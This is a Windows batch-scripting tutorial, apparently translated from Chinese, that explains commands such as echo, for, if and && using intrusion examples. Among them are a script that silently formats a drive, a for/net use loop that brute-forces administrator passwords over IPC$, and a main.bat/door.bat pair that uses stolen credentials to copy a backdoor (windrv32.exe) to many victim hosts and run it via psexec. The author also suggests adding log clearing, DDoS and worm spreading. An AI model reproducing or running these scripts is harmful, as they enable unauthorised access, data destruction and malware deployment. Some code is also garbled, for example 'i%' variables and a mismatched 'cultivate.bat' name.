A brief introduction to Windows .bat scripts:
I. Overview of the basic built-in batch commands
1.Echo command
Turns command echoing on or off, or displays a message. With no parameters, the echo command displays the current echo setting.
Syntax:
echo [{on|off}] [message]
Sample: @echo off / echo hello world
In practice we combine this command with the redirection symbols (also called pipe symbols, usually > >> ^) to write commands into a file of a particular format. Later examples show this.
2.@ command
Hides the command that follows the @. During an intrusion (for example, when using a batch file to format an enemy's hard disk) you naturally cannot let the other side see the commands you are using.
Sample: @echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset
(The format command cannot take the /y parameter; happily, Microsoft left us the autoset parameter, which has the same effect as /y.)
3.Goto command
Jumps to the specified label. Once the label is found, the program continues with the commands starting on the next line.
Syntax: goto label (label is a parameter that specifies the line in the batch program to jump to.)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
(If the if, %1 and %2 here are unclear to you, skip them for now; they are explained in detail later.)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
A label can be given any name, but a meaningful one is best. Put a : in front of the name to mark it as a label; the goto command uses this : to find where to jump next. It is best to add some explanation so that other people reading the script can understand your intent.
4.Rem command
The comment command, equivalent to /*--------*/ in C. It is not executed; it only serves as a comment, making the script easier for others to read and for you to modify later.
Rem Message
Sample: @Rem Here is the description.
5.Pause command
When the Pause command runs, it displays the following message:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
In this example, all files on the disk in drive A are copied to d:\back. When the displayed message prompts you to put another disk into drive A, the pause command suspends the program so that you can change disks, then press any key to continue.
6.Call command
Calls one batch program from another without ending the parent batch program. The call command accepts labels as the target of the call. Call has no effect at the command line when used outside a script or batch file.
Syntax:
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
Parameters:
[Drive:][Path] FileName
Specifies the location and name of the batch program to call. The filename parameter must have a .bat or .cmd extension.
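7.start command
Runs an external program; every DOS command and command-line program can be invoked through start.
Common parameters:
MIN          Start the window minimized
SEPARATE     Start a 16-bit Windows program in a separate memory space
HIGH         Start the application in the HIGH priority class
REALTIME     Start the application in the REALTIME priority class
WAIT         Start the application and wait for it to terminate
parameters   The parameters passed to the command/program
When the application being run is a 32-bit GUI application, CMD.EXE returns to the command prompt without waiting for the application to terminate. This new behavior does not occur when running inside a command script.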
8.choice command
choice lets the user enter a single character and runs different commands depending on it. Use it with the /c: parameter; after c: list the characters that may be entered, with no spaces between them. Its return codes are 1, 2, 3, 4, ...
For example: choice /c:dme defrag,mem,end
displays
defrag,mem,end[D,M,E]?
Sample:
The contents of Sample.bat are as follows:
@echo off
choice /c:dme defrag,mem,end
rem test the highest return code first
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
When this file runs it displays defrag,mem,end[D,M,E]? The user can choose d, m or e, and the if statements then decide: d runs the section labeled defrag, m runs the section labeled mem, and e runs the section labeled end. Each section ends with goto end, which jumps to the end label; the program then displays good bye and the file ends.
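9.If command
if tests whether a given condition is met and decides which command to run accordingly.
There are three forms:
1) if "parameter" == "string" command-to-run
If the parameter equals the specified string, the condition holds and the command runs; otherwise execution moves on to the next line. (Note the two equals signs.)
For example: if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2) if exist filename command-to-run
If the specified file exists, the condition holds and the command runs; otherwise execution moves on to the next line.
For example: if exist config.sys edit config.sys
3) if errorlevel / if not errorlevel number command-to-run
If the return code equals the specified number, the condition holds and the command runs; otherwise execution moves on to the next line.
For example: if errorlevel 2 goto x2
Every DOS program returns a number to DOS when it runs, called the error code (errorlevel) or return code; the common return codes are 0 and 1.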
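In cmd.exe, if errorlevel n is true for any return code of n or higher, which is why the choice sample has to test the highest value first. The batch file below is an added example, not part of the original page; its labels and variable names are hypothetical, and it assumes cmd.exe with command extensions enabled:

```batch
@echo off
rem Added example, not from the original page. Assumes cmd.exe with
rem command extensions, which "call :label" and "goto :eof" require.
rem The letters D, M, E map to return codes 1, 2, 3 as in choice /c:dme.
setlocal
for %%c in (0 1 2 3) do call :compare %%c
endlocal
goto :eof

:compare
rem "cmd /c exit N" ends a child shell with return code N, so the
rem ERRORLEVEL seen by the next line is N.
cmd /c exit %1
rem Lowest value first: "if errorlevel 1" is already true for 1, 2 and 3,
rem so the tests for 2 and 3 are never reached.
if errorlevel 1 (set "low=D") else if errorlevel 2 (set "low=M") else if errorlevel 3 (set "low=E") else (set "low=none")
rem Restore the return code, then test the highest value first.
cmd /c exit %1
if errorlevel 3 (set "high=E") else if errorlevel 2 (set "high=M") else if errorlevel 1 (set "high=D") else (set "high=none")
echo return code %1: lowest-first selects %low%, highest-first selects %high%
goto :eof
```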
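10.for command
for is a fairly complex command, used mainly to run a command repeatedly over a specified range of parameters.
When using the FOR command in a batch file, specify the variable as %%variable.
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable           Specifies a single-letter replaceable parameter.
(set)               Specifies a set of one or more files. Wildcards may be used.
command             Specifies the command to carry out for each file.
command-parameters  Specifies parameters or switches for the specified command.
When using the FOR command in a batch file, specify the variable as %%variable instead of %variable. Variable names are case sensitive, so %i is different from %I.
If command extensions are enabled, the following additional forms of the FOR command are supported:
FOR /D %variable IN (set) DO command [command-parameters]
If set contains wildcards, it is matched against directory names instead of file names.
FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]
Walks the directory tree rooted at [drive:]path, executing the FOR statement in each directory of the tree. If no directory is specified after /R, the current directory is used. If set is just a single period (.) character, it simply enumerates the directory tree.
FOR /L %variable IN (start,step,end) DO command [command-parameters]
The set is a sequence of numbers from start to end, by step amount.
So (1,1,5) generates the sequence 1 2 3 4 5, and (5,-1,1) generates the sequence (5 4 3 2 1).
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN ('command') DO command
Or, if the usebackq option is present:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ('string') DO command
FOR /F ["options"] %variable IN (`command`) DO command
filenameset is one or more file names. Each file is opened, read and processed before going on to the next file in filenameset.
Processing consists of reading in the file, breaking it up into individual lines of text, and then parsing each line into zero or more tokens. The body of the for loop is then called with the variable value(s) set to the token string(s) found. By default, /F passes the first blank-separated token from each line of each file. Blank lines are skipped. You can override the default parsing behavior by specifying the optional "options" parameter. This is a quoted string containing one or more keywords that specify different parsing options. The keywords are:
eol=c           - specifies an end-of-line comment character (just one)
skip=n          - specifies the number of lines to skip at the beginning of the file.
delims=xxx      - specifies a delimiter set. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n  - specifies which tokens from each line are passed to the for body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, specifying the mth through the nth tokens. If the last character in the tokens= string is an asterisk, an additional variable is allocated and receives the remaining text on the line after the last token parsed.
usebackq        - specifies that the new semantics are in force, where a back-quoted string is executed as a command, a single-quoted string is a literal string command, and double quotes may be used to quote file names in file-set.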
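sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
This parses each line in myfile.txt, ignoring lines that begin with a semicolon, and passes the 2nd and 3rd token from each line to the for body, with tokens delimited by commas and/or spaces. Note that the for body statements reference %i to get the 2nd token, %j to get the 3rd token, and %k to get all remaining tokens after the 3rd. For file names that contain spaces, you need to enclose the file names in double quotes. To use double quotes this way, you also need the usebackq option; otherwise the double quotes are interpreted as defining a literal string to parse.
%i is declared explicitly in the for statement, and %j and %k are declared through the tokens= option. You can specify up to 26 tokens on the tokens= line, provided it does not cause an attempt to declare a variable higher than the letter 'z' or 'Z'. Remember that FOR variables are single-letter, case sensitive and global, and no more than 52 can be active at any one time.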
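The options from sample1, run against a small file, as an added example that is not part of the original page. The file name (placed under %TEMP%, with spaces in it to show the usebackq quoting) and the sample lines are constructed; because this is a batch file, the variables are written %%i, %%j and %%k:

```batch
@echo off
rem Added example, not from the original page. The file name and the
rem sample lines are constructed; run it from a .bat file under cmd.exe.
setlocal
set "DATA=%TEMP%\forf demo %RANDOM%.txt"
rem Build the input: a comment line, two data lines and a one-token line.
> "%DATA%" echo ; lines starting with the eol character are ignored
>>"%DATA%" echo alpha,bravo charlie delta echo
>>"%DATA%" echo one two,,three
>>"%DATA%" echo lonely

rem usebackq lets the file name be double-quoted (it contains spaces);
rem without it, the quoted text itself would be parsed as a string.
rem delims=, followed by a space splits on commas and spaces, and runs
rem of delimiters count as one. tokens=2,3* puts token 2 in %%i,
rem token 3 in %%j and the rest of the line in %%k.
for /f "usebackq eol=; tokens=2,3* delims=, " %%i in ("%DATA%") do (
    echo second=[%%i] third=[%%j] rest=[%%k]
)
rem The line "lonely" has no second token, so the body does not run for it.
del "%DATA%"
endlocal
```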
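You can also use the FOR /F parsing logic on an immediate string, by enclosing the filenameset between the parentheses in single quotes. The string is then treated as a single line of input from a file.
Finally, you can use the FOR /F command to parse the output of a command, by making the filenameset between the parentheses a back-quoted string. The string is treated as a command line and passed to a child CMD.EXE; its output is captured into memory and parsed as if it were a file. So the following example:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
enumerates the names of the environment variables in the current environment.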
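In addition, substitution of FOR variable references has been enhanced. You can now use the following optional syntax:
%~I         - expands %I, removing any surrounding quotes (")
%~fI        - expands %I to a fully qualified path name
%~dI        - expands %I to a drive letter only
%~pI        - expands %I to a path only
%~nI        - expands %I to a file name only
%~xI        - expands %I to a file extension only
%~sI        - expanded path contains short names only
%~aI        - expands %I to the file attributes of the file
%~tI        - expands %I to the date/time of the file
%~zI        - expands %I to the size of the file
%~$PATH:I   - searches the directories listed in the PATH environment variable and expands %I to the fully qualified name of the first one found. If the environment variable is not defined, or the file is not found, this modifier expands to the empty string
The modifiers can be combined to get compound results:
%~dpI       - expands %I to a drive letter and path only
%~nxI       - expands %I to a file name and extension only
%~fsI       - expands %I to a full path name with short names only
%~dp$PATH:i - searches the directories listed in the PATH environment variable and expands %I to the drive letter and path of the first one found.
%~ftzaI     - expands %I to a DIR-like output line
In the above examples, %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid FOR variable name. Picking upper-case variable names like %I makes it more readable and avoids confusion with the modifiers, which are not case sensitive.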
The above is Microsoft's official help. Below are a few examples showing concretely how the For command is used in intrusions.
sample2:
Using the For command to brute-force the password of a target Win2k host.
We use net use file://ip/ipc$ "password" /u:"administrator" to try to connect to the target host, and note down the password when it succeeds.
The key command is a single line: for /f i% in (dict.txt) do net use file://ip/ipc$ "i%" /u:"administrator"
i% stands for the admin password; each value of i% taken from dict.txt is used with the net use command to connect. The output of the program is then passed to the find command:
for /f i%% in (dict.txt) do net use file://ip/ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt
and that's a KO.
sample3:
Have you ever had a large number of compromised machines on your hands waiting for you to plant a backdoor + trojan? When there are a great many of them, what started out as fun turns tedious :). The beginning of the article said that batch files can simplify everyday or repetitive tasks. So how is that done? Heh, read on and you'll see.
Again there is only one key command: (when using the FOR command in a batch file, specify the variable as %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
For the use of tokens, see sample1 above; here it passes the contents of victim.txt, in order, to the parameters %i %j %k of door.bat.
And cultivate.bat simply uses the net use command to establish an IPC$ connection and copy the trojan + backdoor to the victim, then uses the return code (If errorlevel =) to pick out the hosts where the backdoor was planted successfully, and echoes them to the screen or to a specified file.
delims= means that the contents of victim.txt are separated by a space. By now you surely understand what the contents of victim.txt look like: they should be arranged according to what %%i %%j %%k stand for, generally ip password username.
Code prototype:
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------
------
------------------- cut here then save as a batchfile(I call it door.bat) ------------------
-----------
@net use file://%1/ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3
>>ko.txt
@psexec file://%1/ c:\winnt\system32\windrv32.exe
@psexec file://%1/ net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------
------------
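This is only a prototype of a batch file for planting backdoors automatically. The two batch files, the backdoor program (Windrv32.exe) and PSexec.exe must be placed in the same directory. The batch content can be extended further, for example by adding log clearing + DDOS, or adding users on a schedule; going a step further, it could be given the ability to spread automatically (a worm). I won't go into that here; interested readers can research it on their own.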
II. How to use parameters in a batch file
Batch files can take parameters, normally the nine from %1 to %9. When there are more parameters, shift is needed to move through them; that situation is uncommon, so we will not consider it.
sample1: fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/autoset
@echo please insert another disk to driver A.
@pause
@goto format
This example formats several floppy disks in a row, so to use it you type fomat.bat a in the DOS window. Heh, that seems a bit like gilding the lily~
sample2:
Whenever we set up an IPC$ connection we have to type a long string of commands, and it is easy to make a typo, so we may as well put the fixed commands into a batch file and pass the compromised machine's ip password username to it as parameters; that way we don't have to type the commands every time.
@echo off
@net use file://1%/ipc$ "2%" /u:"3%"
(Note: here PASSWORD is the second parameter.)
@if errorlevel 1 echo connection failed
How about that, using parameters is fairly simple, isn't it? Someone as handsome as you has surely learned it. No.3
III. How to use compound commands (Compound Command)
1.&
Usage: first command & second command [& third command...]
This runs several commands in one go, regardless of whether each command succeeds.
Sample:
C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:51 .
2002-05-14 23:51 ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage: first command && second command [&& third command...]
This runs several commands in one go; once a command fails, the commands after it are not run. If no command fails, all of them run to completion.
Sample:
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.
C:\>dir c:\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:\Ex4rch
2002-05-14 23:55 .
2002-05-14 23:55 ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
This form can make things simpler when doing backups, for example:
dir \\192.168.0.1\database\backup.mdb && copy \\192.168.0.1\database\backup.mdb E:\backup
If backup.mdb exists on the remote server, the copy command runs; if the file does not exist, the copy command does not run. This usage can replace IF exist.
3.||
Usage: first command || second command [|| third command...]
This runs several commands in one go; once a command succeeds, the commands after it are not run. If no command succeeds, all of them are run.
Sample:
C:\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:\Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
An example of compound commands in use:
sample:
@copy trojan.exe file://%1/admin$/system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3
>>victim.txt
Follow-up question: is copying and pasting really that much fun??